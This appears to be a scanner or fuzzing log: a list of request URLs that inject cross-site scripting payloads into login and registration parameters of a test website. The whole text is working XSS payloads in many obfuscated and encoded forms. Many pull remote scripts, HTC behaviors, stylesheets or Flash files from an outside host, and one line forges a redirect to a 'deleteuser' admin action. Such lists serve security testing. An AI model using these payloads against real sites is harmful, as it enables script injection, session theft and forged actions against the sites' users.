/test/website/index.php?password=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/test/website/register.php?password=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E
/test/website/register.php?username=Redirect+302+/a.jpg+http://victimsite.com/admin.asp&deleteuser
/test/website/index.php?username=<SCRIPT+SRC=http://ha.ckers.org/xss.js
/test/website/index.php?password=<STYLE>li+{list-style-image:+url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
/test/website/index.php?username=%3CDIV+STYLE%3D%22background-image%3A%00075%00072%0006C%00028%27%0006a%00061%00076%00061%00073%00063%00072%00069%00070%00074%0003a%00061%0006c%00065%00072%00074%00028.1027%00058.1053%00053%00027%00029%27%00029%22%3E
/test/website/?username=<A+HREF="h+tt+p://6&#09;6.000146.0x7.147/">XSS</A>&password=<A+HREF="h+tt+p://6&#09;6.000146.0x7.147/">XSS</A>&name=<A+HREF="h+tt+p://6&#09;6.000146.0x7.147/">XSS</A>&
/test/website/register.php?password=<BODY+BACKGROUND="javascript:alert('XSS');">
/test/website/?name=<A+HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
/test/website/index.php?password=<!--[if+gte+IE+4]>+<SCRIPT>alert('XSS');</SCRIPT>+<![endif]-->
/test/website/index.php?password=%3CHEAD%3E%3CMETA+HTTP-EQUIV%3D%22CONTENT-TYPE%22+CONTENT%3D%22text%2Fhtml%3B+charset%3DUTF-7%22%3E+%3C%2FHEAD%3E%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-
/test/website/index.php?name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/register.php?name=%3CBODY+onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E
/test/website/?username=%3CBODY+onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E
/test/website/index.php?password=%3CDIV+STYLE%3D%22background-image%3A+url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E
/test/website/index.php?password=%3CXML+ID%3D%22xss%22%3E%3CI%3E%3CB%3E%3CIMG+SRC%3D%22javas%3C%21--+--%3Ecript%3Aalert%28%27XSS%27%29%22%3E%3C%2FB%3E%3C%2FI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%22%23xss%22+DATAFLD%3D%22B%22+DATAFORMATAS%3D%22HTML%22%3E%3C%2FSPAN%3E
/test/website/register.php?username=<IMG+SRC=javascript:alert(String.fromCharCode(88,83,83))>
/test/website/?name=%25BCscript%25BEalert%28%25A2XSS%25A2%29%25BC%2Fscript%25BE
/test/website/register.php?password=%3CSTYLE+TYPE%3D%22text%2Fjavascript%22%3Ealert%28%27XSS%27%29%3B%3C%2FSTYLE%3E
/test/website/register.php?name=<HTML+xmlns:xss>+<?import+namespace="xss"+implementation="http://ha.ckers.org/xss.htc">+<xss:xss>XSS</xss:xss>+</HTML>
/test/website/?password=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E
/test/website/register.php?username=perl+-e+'print+"&<SCR IPT>alert("XSS")</SCR IPT>";'+>+out&password2=perl+-e+'print+"&<SCR IPT>alert("XSS")</SCR IPT>";'+>+out&password=perl+-e+'print+"&<SCR IPT>alert("XSS")</SCR IPT>";'+>+out&name=perl+-e+'print+"&<SCR IPT>alert("XSS")</SCR IPT>";'+>+out&
/test/website/index.php?username=<A+HREF="http://ha.ckers.org@google">XSS</A>
/test/website/?name=<HTML+xmlns:xss>+<?import+namespace="xss"+implementation="http://ha.ckers.org/xss.htc">+<xss:xss>XSS</xss:xss>+</HTML>
/test/website/index.php?name=<A+HREF="javascript:document.location='http://www.google.com/'">XSS</A>
/test/website/?name=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/test/website/index.php?username=<STYLE+TYPE="text/javascript">alert('XSS');</STYLE>
/test/website/register.php?name=\";alert('XSS');//
/test/website/register.php?username=<SCRIPT>alert('XSS')</SCRIPT>
/test/website/register.php?name=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22
/test/website/register.php?username=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/test/website/register.php?password2=perl+-e+'print+"<IMG+SRC=java script:alert("XSS")>";'>+out
/test/website/index.php?username=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E&password=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E&name=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E&
/test/website/?password=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E
/test/website/?password=<IMG+SRC=javascript:alert('XSS')>
/test/website/register.php?username=a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";+eval(a+b+c+d);
/test/website/index.php?password=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
/test/website/index.php?username=<SCRIPT+SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>&password=<SCRIPT+SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>&name=<SCRIPT+SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>&
/test/website/index.php?password=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/test/website/register.php?password2=<XML+ID="xss"><I><B><IMG+SRC="javas<!--+-->cript:alert('XSS')"></B></I></XML>+<SPAN+DATASRC="#xss"+DATAFLD="B"+DATAFORMATAS="HTML"></SPAN>
/test/website/?username=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/test/website/?password=<IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
/test/website/index.php?username=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/test/website/?name=<SCRIPT+="blah"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/index.php?username=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E&password=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E&name=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E&
/test/website/?name=<DIV+STYLE="background-image:url('javascript:alert(XS')')">
/test/website/register.php?password2=%3CIMG+DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/index.php?username=%3CBODY+BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E&password=%3CBODY+BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E&name=%3CBODY+BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E&
/test/website/index.php?username=<A+HREF="http://66.102.7.147/">XSS</A>
/test/website/index.php?name=</TITLE><SCRIPT>alert("XSS");</SCRIPT>
/test/website/?username=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser&password=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser&name=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser&
/test/website/index.php?username=<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
/test/website/index.php?username=<IMG+SRC="jav+ascript:alert('XSS');">
/test/website/?username=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/index.php?username=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E&password=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E&name=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E&
/test/website/?password=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/test/website/register.php?password2=perl+-e+'print+"<IMG+SRC=java script:alert("XSS")>";'>+out
/test/website/register.php?name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E
/test/website/register.php?password=%3CIMG+SRC%3D%60javascript%3Aalert%28%22RSnake+says%2C+%27XSS%27%22%29%60%3E
/test/website/index.php?name=%3CTABLE+BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E%3C%2FTABLE%3E
/test/website/index.php?username=<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>&password=<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>&name=<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>&
/test/website/register.php?username=\";alert('XSS');//&password2=\";alert('XSS');//&password=\";alert('XSS');//&name=\";alert('XSS');//&
/test/website/?name=exp/*<XSS+STYLE='no\xss:noxss("*//*");+xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
/test/website/index.php?username=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/test/website/index.php?username=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E
/test/website/register.php?username=%3CIMG+STYLE%3D%22xss%3Aexpr%2F%2AXSS%2A%2Fession%28alert%28%27XSS%27%29%29%22%3E
/test/website/index.php?username=<SCRIPT+SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
/test/website/register.php?username=<BR+SIZE="&{alert('XSS')}">
/test/website/index.php?username=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/register.php?username=<IMG+SRC="+&#14;+javascript:alert('XSS');">
/test/website/index.php?username=perl+-e+'print+"<IMG+SRC=java script:alert("XSS")>";'>+out&password=perl+-e+'print+"<IMG+SRC=java script:alert("XSS")>";'>+out&name=perl+-e+'print+"<IMG+SRC=java script:alert("XSS")>";'>+out&
/test/website/?username=%3CBODY+BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?password=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?username=%3CIMG+SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E
/test/website/index.php?username=<IMG+SRC="jav+ascript:alert('XSS');">
/test/website/index.php?name=<SCRIPT/XSS+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/index.php?name=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/test/website/?password=<+%3C+&lt+&lt;+&LT+&LT;+&#60+&#060+&#0060+&#00060+&#000060+&#0000060+&#60;+&#060;+&#0060;+&#00060;+&#000060;+&#0000060;+&#x3c+&#x03c+&#x003c+&#x0003c+&#x00003c+&#x000003c+&#x3c;+&#x03c;+&#x003c;+&#x0003c;+&#x00003c;+&#x000003c;+&#X3c+&#X03c+&#X003c+&#X0003c+&#X00003c+&#X000003c+&#X3c;+&#X03c;+&#X003c;+&#X0003c;+&#X00003c;+&#X000003c;+&#x3C+&#x03C+&#x003C+&#x0003C+&#x00003C+&#x000003C+&#x3C;+&#x03C;+&#x003C;+&#x0003C;+&#x00003C;+&#x000003C;+&#X3C+&#X03C+&#X003C+&#X0003C+&#X00003C+&#X000003C+&#X3C;+&#X03C;+&#X003C;+&#X0003C;+&#X00003C;+&#X000003C;+\x3c+\x3C+\u003c+\u003C
/test/website/register.php?password2=<SCRIPT+SRC=//ha.ckers.org/.j>
/test/website/?name=%25BCscript%25BEalert%28%25A2XSS%25A2%29%25BC%2Fscript%25BE
/test/website/register.php?password2=<SCRIPT+"a='>'"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/register.php?password=<A+HREF="http://66.102.7.147/">XSS</A>
/test/website/?password=<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
/test/website/register.php?name=<IMG+SRC=javascript:alert('XSS')>
/test/website/?password=<BASE+HREF="javascript:alert('XSS');//">
/test/website/index.php?password=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E
/test/website/register.php?password=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/?name=<IMG+SRC=JaVaScRiPt:alert('XSS')>
/test/website/?username=<IMG+LOWSRC="javascript:alert('XSS');">&password=<IMG+LOWSRC="javascript:alert('XSS');">&name=<IMG+LOWSRC="javascript:alert('XSS');">&
/test/website/?password=<!--#exec+cmd="/bin/echo+'<SCRIPT+SRC'"--><!--#exec+cmd="/bin/echo+'=http://ha.ckers.org/xss.js></SCRIPT>'"-->
/test/website/?username=<IMG+SRC="javascript:alert('XSS')"&password=<IMG+SRC="javascript:alert('XSS')"&name=<IMG+SRC="javascript:alert('XSS')"&
/test/website/?username=<HEAD><META+HTTP-EQUIV="CONTENT-TYPE"+CONTENT="text/html;+charset=UTF-7">+</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
/test/website/register.php?password=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E
/test/website/register.php?name=<IMG+SRC=javascript:alert(String.fromCharCode(88,83,83))>
/test/website/register.php?name=%3CIMG+SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?username=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E&password=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E&name=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E&
/test/website/register.php?password2=%3CDIV+STYLE%3D%22background-image%3A+url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E
/test/website/?username=<<SCRIPT>alert("XSS");//<</SCRIPT>&password=<<SCRIPT>alert("XSS");//<</SCRIPT>&name=<<SCRIPT>alert("XSS");//<</SCRIPT>&
/test/website/register.php?password=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E
/test/website/index.php?username=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/index.php?password=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/test/website/index.php?username=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&password=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&
/test/website/register.php?password2=<A+HREF="http://www.google.com./">XSS</A>
/test/website/register.php?password2=%3CSTYLE%3E%40im%5Cport%27%5Cja%5Cvasc%5Cript%3Aalert%28%22XSS%22%29%27%3B%3C%2FSTYLE%3E
/test/website/register.php?username=%3CDIV+STYLE%3D%22width%3A+expression%28alert%28%27XSS%27%29%29%3B%22%3E
/test/website/register.php?password=<IMG+"""><SCRIPT>alert("XSS")</SCRIPT>">
/test/website/register.php?name=%3CIMG+SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E
/test/website/index.php?username=%3CIMG+SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/register.php?name=<IMG+SRC='vbscript:msgbox("XSS")'>
/test/website/?username=%3CIMG+SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E
/test/website/register.php?password=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/test/website/?name=<HTML><BODY>+<?xml:namespace+prefix="t"+ns="urn:schemas-microsoft-com:time">+<?import+namespace="t"+implementation="#default#time2">+<t:set+attributeName="innerHTML"+to="XSS<SCRIPT+DEFER>alert('XSS')</SCRIPT>">+</BODY></HTML>
/test/website/?username=<META+HTTP-EQUIV="refresh"+CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">&password=<META+HTTP-EQUIV="refresh"+CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">&name=<META+HTTP-EQUIV="refresh"+CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">&
/test/website/register.php?username=<?+echo('<SCR)';+echo('IPT>alert("XSS")</SCRIPT>');+?>
/test/website/?password=</TITLE><SCRIPT>alert("XSS");</SCRIPT>
/test/website/?password=<SCRIPT+SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
/test/website/?name=%3CA+HREF%3D%22javascript%3Adocument.location%3D%27http%3A%2F%2Fwww.google.com%2F%27%22%3EXSS%3C%2FA%3E
/test/website/?password=<A+HREF="//google">XSS</A>
/test/website/?username=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&password=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&
/test/website/register.php?username=<SCRIPT+"a='>'"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/?username=<A+HREF="http://google:ha.ckers.org">XSS</A>&password=<A+HREF="http://google:ha.ckers.org">XSS</A>&name=<A+HREF="http://google:ha.ckers.org">XSS</A>&
/test/website/register.php?username=<IMG+SRC=javascript:alert(&quot;XSS&quot;)>
/test/website/?name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/register.php?password=<BR+SIZE="&{alert('XSS')}">
/test/website/index.php?username=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E&password=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E&name=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E&
/test/website/register.php?name=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/test/website/register.php?password2=<IMG+SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
/test/website/register.php?password2=%3CDIV+STYLE%3D%22width%3A+expression%28alert%28%27XSS%27%29%29%3B%22%3E
/test/website/index.php?username=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/test/website/?name=<IMG+SRC="jav&#x0A;ascript:alert('XSS');">
/test/website/register.php?username=%3CDIV+STYLE%3D%22background-image%3A%00075%00072%0006C%00028%27%0006a%00061%00076%00061%00073%00063%00072%00069%00070%00074%0003a%00061%0006c%00065%00072%00074%00028.1027%00058.1053%00053%00027%00029%27%00029%22%3E
/test/website/index.php?username=<HTML><BODY>+<?xml:namespace+prefix="t"+ns="urn:schemas-microsoft-com:time">+<?import+namespace="t"+implementation="#default#time2">+<t:set+attributeName="innerHTML"+to="XSS<SCRIPT+DEFER>alert('XSS')</SCRIPT>">+</BODY></HTML>&password=<HTML><BODY>+<?xml:namespace+prefix="t"+ns="urn:schemas-microsoft-com:time">+<?import+namespace="t"+implementation="#default#time2">+<t:set+attributeName="innerHTML"+to="XSS<SCRIPT+DEFER>alert('XSS')</SCRIPT>">+</BODY></HTML>&name=<HTML><BODY>+<?xml:namespace+prefix="t"+ns="urn:schemas-microsoft-com:time">+<?import+namespace="t"+implementation="#default#time2">+<t:set+attributeName="innerHTML"+to="XSS<SCRIPT+DEFER>alert('XSS')</SCRIPT>">+</BODY></HTML>&
/test/website/?name=<A+HREF="http://google:ha.ckers.org">XSS</A>
/test/website/index.php?name=%3CBR+SIZE%3D%22%26%7Balert%28%27XSS%27%29%7D%22%3E
/test/website/index.php?name=<SCRIPT/XSS+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/register.php?password2=%3COBJECT+classid%3Dclsid%3Aae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam+name%3Durl+value%3Djavascript%3Aalert%28%27XSS%27%29%3E%3C%2FOBJECT%3E
/test/website/index.php?password=<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
/test/website/register.php?name=<IMG+"""><SCRIPT>alert("XSS")</SCRIPT>">
/test/website/index.php?username=%3CIMG+SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?password=<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
/test/website/?username=<LINK+REL="stylesheet"+HREF="javascript:alert('XSS');">
/test/website/index.php?name=<A+HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
/test/website/?username=%3CA+HREF%3D%22javascript%3Adocument.location%3D%27http%3A%2F%2Fwww.google.com%2F%27%22%3EXSS%3C%2FA%3E&password=%3CA+HREF%3D%22javascript%3Adocument.location%3D%27http%3A%2F%2Fwww.google.com%2F%27%22%3EXSS%3C%2FA%3E&name=%3CA+HREF%3D%22javascript%3Adocument.location%3D%27http%3A%2F%2Fwww.google.com%2F%27%22%3EXSS%3C%2FA%3E&
/test/website/?password=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/test/website/?name=<IMG+SRC='vbscript:msgbox("XSS")'>
/test/website/?name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/test/website/?username=%3CSTYLE+type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E
/test/website/?username=<XSS+STYLE="xss:expression(alert('XSS'))">&password=<XSS+STYLE="xss:expression(alert('XSS'))">&name=<XSS+STYLE="xss:expression(alert('XSS'))">&
/test/website/register.php?name=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/test/website/?username=<IMG+SRC="livescript:[code]">&password=<IMG+SRC="livescript:[code]">&name=<IMG+SRC="livescript:[code]">&
/test/website/?password=<XSS+STYLE="xss:expression(alert('XSS'))">
/test/website/register.php?password2=%3CA+HREF%3D%22http%3A%2F%2F66.102.7.147%2F%22%3EXSS%3C%2FA%3E
/test/website/register.php?password2=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E
/test/website/?password=<SCRIPT+a=">"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/?name=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/test/website/register.php?name=%3CIFRAME+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E
/test/website/index.php?username=<SCRIPT+"a='>'"+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/?password=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/test/website/index.php?name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E
/test/website/register.php?password=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
